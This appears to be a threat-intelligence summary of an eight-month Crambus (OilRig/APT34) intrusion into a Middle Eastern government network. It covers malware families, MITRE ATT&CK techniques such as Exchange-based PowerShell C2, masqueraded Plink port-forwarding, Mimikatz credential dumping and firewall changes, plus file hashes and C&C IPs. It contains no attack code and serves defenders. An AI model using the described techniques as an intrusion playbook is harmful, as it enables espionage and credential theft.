Crambus (OilRig/APT34) conducted an eight-month intrusion against a Middle Eastern government in early 2023, stealing files, passwords, and emails while deploying backdoors and credential dumping tools. The operation relied on PowerShell backdoors (PowerExchange), Plink-based port-forwarding for RDP, and living-off-the-land techniques to maintain access. #Crambus #PowerExchange
Keypoints
- The Iranian espionage group Crambus staged an eight-month intrusion against a Middle Eastern government between February and September 2023, compromising at least 12 computers and likely more.
- Crambus deployed multiple malware components (Backdoor.Tokel, Trojan.Dirps, Infostealer.Clipog, Backdoor.PowerExchange, Mimikatz) plus Plink and other living-off-the-land tools to maintain access and collect data.
- Backdoor.PowerExchange uses a compromised Exchange Server as a C2, monitoring for attacker emails and executing PowerShell commands based on special email triggers.
- Attackers frequently used Plink to configure port forwarding, enabling remote access via RDP and advancing lateral movement across the network.
- The campaign included extensive credential theft (Mimikatz), system discovery (netstat), and firewall rule modifications to facilitate remote access.
- The operators engaged in email harvesting via PowerShell-driven workflows and custom Exchange rules to exfiltrate data and operate covertly within the environment.
- Crambus is described as a long-running threat with a history of socially engineered initial access and ongoing activity in the Middle East and beyond.
MITRE Techniques
- [T1059.001] PowerShell – “PowerShell-based malware that can log into an Exchange Server with hardcoded credentials and monitor for emails sent by the attackers. It uses an Exchange Server as a C&C.”
- [T1021.001] Remote Services – “port-forwarding rules on compromised machines, enabling remote access via the Remote Desktop Protocol (RDP).”
- [T1049] System Network Connections Discovery – “netstat commands to retrieve a full list of all TCP and UDP connections.”
- [T1036] Masquerading – “a renamed version of Plink (msssh.exe), a command-line connection tool for the PuTTY SSH client, was used to configure port-forwarding rules…”
- [T1027] Obfuscated/Compressed Files and Information – “The C&C address is stored in a separate, RC4 encrypted file called token.bin.”
- [T1562.004] Impair Defenses – “modified Windows firewall rules in order to enable remote access.”
- [T1047] Windows Management Instrumentation – “WMI (Windows Management Instrumentation) was used to execute Plink in order to open port-forwarding…”
- [T1003] Credential Dumping – “Mimikatz was executed from the %TEMP% directory to dump credentials.”
Indicators of Compromise
- [File hash] – Backdoor.Tokel – 4d04ad9d3c3abeb61668e52a52a37a46c1a60bc8f29f12b76ff9f580caeefba8, 41672b08e6e49231aedf58123a46ed7334cafaad054f2fd5b1e0c1d5519fd532
- [File hash] – Trojan.Dirps – 497e1c76ed43bcf334557c64e1a9213976cd7df159d695dcc19c1ca3d421b9bc
- [File hash] – Infostealer.Clipog – 75878356f2e131cefb8aeb07e777fcc110475f8c92417fcade97e207a94ac372
- [File hash] – Backdoor.PowerExchange – d884b3178fc97d1077a13d47aadf63081559817f499163c2dc29f6828ee08cae
- [IP address] – Plink C&C – 78.47.218.106, 192.121.22.46, 151.236.19.91, 91.132.92.90
- [File name] – Telecomm.exe (Backdoor.Tokel), msssh.exe (masqueraded Plink)